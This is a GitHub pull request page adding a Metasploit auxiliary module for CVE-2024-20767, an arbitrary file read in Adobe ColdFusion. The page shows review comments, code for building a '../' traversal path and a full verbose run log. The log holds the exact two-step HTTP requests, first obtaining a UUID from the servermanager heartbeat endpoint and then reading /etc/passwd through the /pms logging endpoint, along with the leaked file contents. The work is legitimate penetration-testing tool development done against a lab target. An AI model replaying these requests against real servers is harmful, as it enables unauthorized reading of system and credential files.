Adobe ColdFusion Arbitrary File Read [CVE-2024-20767] #19050
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
smcintyre-r7
reviewed
Apr 4, 2024
jheysel-r7
changed the title
There was a problem hiding this comment.
Thanks @jheysel-r7 for this module! I was able to find a vulnerable target (version 2023.0.0.330468 installed on Linux) and posted the output in a comment below. I left a couple of additional comments for you to review when you get a chance. Thanks!
|
|
||
| register_options( | ||
| [ | ||
| Opt::RPORT(80), |
There was a problem hiding this comment.
Default ColdFusion port is 8500/TCP. Maybe this would be a good idea to use it as a default value?
Comment on lines
75
to
78
| print_status("Attempting to exploit directory traversal to read #{datastore['FILE_NAME']}") | ||
|
|
||
| traversal_path = '../' * datastore['DEPTH'] | ||
| file_path = "#{traversal_path}#{datastore['FILE_NAME']}" |
There was a problem hiding this comment.
It looks like the option name is FILE_PATH.
Suggested change
| print_status("Attempting to exploit directory traversal to read #{datastore['FILE_NAME']}") | |
| traversal_path = '../' * datastore['DEPTH'] | |
| file_path = "#{traversal_path}#{datastore['FILE_NAME']}" | |
| print_status("Attempting to exploit directory traversal to read #{datastore['FILE_PATH']}") | |
| traversal_path = '../' * datastore['DEPTH'] | |
| file_path = "#{traversal_path}#{datastore['FILE_PATH']}" |
Comment on lines
102
to
104
| # TODO: Once we have a better idea of the formatting the file is returned in edit this loop to trim the fat. | ||
| # TODO From the screenshot in the write up it looks like it returns an array where the first element is null and | ||
| # TODO the file contents are listed after that but each line is prefixed with a "_" |
There was a problem hiding this comment.
It seems to work with version 2023.0.0.330468 on Linux and this is the output I got:
msf6 auxiliary(gather/coldfusion_pms_servlet_file_read) > run verbose=true rhosts=192.168.101.230 rport=8500 httptrace=true
[*] Running module against 192.168.101.230
[*] Attempting to retrieve UUID ...
####################
# Request:
####################
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: 192.168.101.230:8500
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1
####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Date: Thu, 02 May 2024 10:26:18 GMT
<wddxPacket version='1.0'><header/><data><struct><var name='started_at'><number>1.71464426831E12</number></var><var name='monitoring_enabled'><boolean value='false'/></var><var name='es_port'><number>0.0</number></var><var name='port'><string>8500</string></var><var name='host'><string>192.168.101.230</string></var><var name='j2ee'><boolean value='false'/></var><var name='traking_enabled'><boolean value='false'/></var><var name='time_stamp'><number>1.71464557857E12</number></var><var name='display_name'><string></string></var><var name='instance_id'><string>192.168.101.230:cfusion:8500</string></var><var name='group_id'><null/></var><var name='name'><string>cfusion</string></var><var name='group_name'><null/></var><var name='jdk'><string>oracle</string></var><var name='https_enabled'><boolean value='false'/></var><var name='es_host'><string></string></var><var name='version'><number>1.0</number></var><var name='cluster_id'><null/></var><var name='uuid'><string>4c8c8f6a-198c-47fd-ba51-97a6aba6790c</string></var></struct></data></wddxPacket>
[+] UUID found: 4c8c8f6a-198c-47fd-ba51-97a6aba6790c
[*] Attempting to exploit directory traversal to read /etc/passwd
####################
# Request:
####################
GET /pms?module=logging&file_name=../../../../..//etc/passwd&number_of_lines=10000 HTTP/1.1
Host: 192.168.101.230:8500
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1
uuid: 4c8c8f6a-198c-47fd-ba51-97a6aba6790c
####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 1481
Date: Thu, 02 May 2024 10:26:18 GMT
[n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash, hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false, pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin, colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin, nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin, speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false, whoopsie:x:117:124::/nonexistent:/bin/false, cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin, kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin, usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin, tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin, uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin, _apt:x:105:65534::/nonexistent:/usr/sbin/nologin, systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin, systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin, nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin, irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin, backup:x:34:34:backup:/var/backups:/usr/sbin/nologin, proxy:x:13:13:proxy:/bin:/usr/sbin/nologin, news:x:9:9:news:/var/spool/news:/usr/sbin/nologin, lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin, games:x:5:60:games:/usr/games:/usr/sbin/nologin, sys:x:3:3:sys:/dev:/usr/sbin/nologin, daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin]
[+] File content received:
[*] [n00tmeg:x:1000:1000:n00tmeg,,,:/home/n00tmeg:/bin/bash, hplip:x:127:7:HPLIP system user,,,:/run/hplip:/bin/false, pulse:x:125:132:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin, colord:x:123:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin, nm-openvpn:x:121:127:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin, speech-dispatcher:x:119:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false, whoopsie:x:117:124::/nonexistent:/bin/false, cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin, kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin, usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin, tcpdump:x:109:117::/nonexistent:/usr/sbin/nologin, uuidd:x:107:115::/run/uuidd:/usr/sbin/nologin, _apt:x:105:65534::/nonexistent:/usr/sbin/nologin, systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin, systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin, nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin, irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin, backup:x:34:34:backup:/var/backups:/usr/sbin/nologin, proxy:x:13:13:proxy:/bin:/usr/sbin/nologin, news:x:9:9:news:/var/spool/news:/usr/sbin/nologin, lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin, games:x:5:60:games:/usr/games:/usr/sbin/nologin, sys:x:3:3:sys:/dev:/usr/sbin/nologin, daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin]
[+] Results saved to: /home/msfuser/.msf4/loot/20240502122618_default_192.168.101.230_coldfusion.file_974829.txt
[*] Auxiliary module execution completed
There was a problem hiding this comment.
Thanks for posting that output @cdelafuente-r7! I've updated the parsing logic in e3d7dce
|
Thanks for updating this @jheysel-r7! Everything looks good to me now. I tested against ColdFusion version 2023.0.0.330468 on Ubuntu 22.04.2 and verified the file content was returned. I'll go ahead and land it.
|
cdelafuente-r7
added
the
rn-modules
cdelafuente-r7
closed this pull request by merging all changes
into
rapid7:master
in
69cbddd
Release NotesThis adds an auxiliary module to exploit an Arbitrary File Read Vulnerability in Adobe ColdFusion versions prior to '2023 Update 6' and prior to '2021 Update 12'. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR adds a gather module to exploit an Arbitrary File Read Vulnerability in Adobe ColdFusion. Versions affected are including and prior to '2023 Update 6' and '2021 Update 12'.
When testing I number of different affected versions I was unable to get a UUID from hitting the endpoint specified by the original write up / the PoCs. The endpoint would only return a 500. There seems to be something wrong with my test environment (possibly trial / developer version?). I heard others were running into this issue as well.
So I decided to create a quick mock python server so I could test the happy path of the module and PR this to get some more visibility / see if anyone might know why the endpoint
/CFIDE/adminapi/_servermanager/servermanager.cfcis 500ing.mock_server.py
Verification
List the steps needed to make sure this thing works
use coldfusion_pms_servlet_file_readRHOSTand datastore optionFILE_PATHdatastore options from/tmp/passwdto a file path that exists on Windows.FILE_PATHfile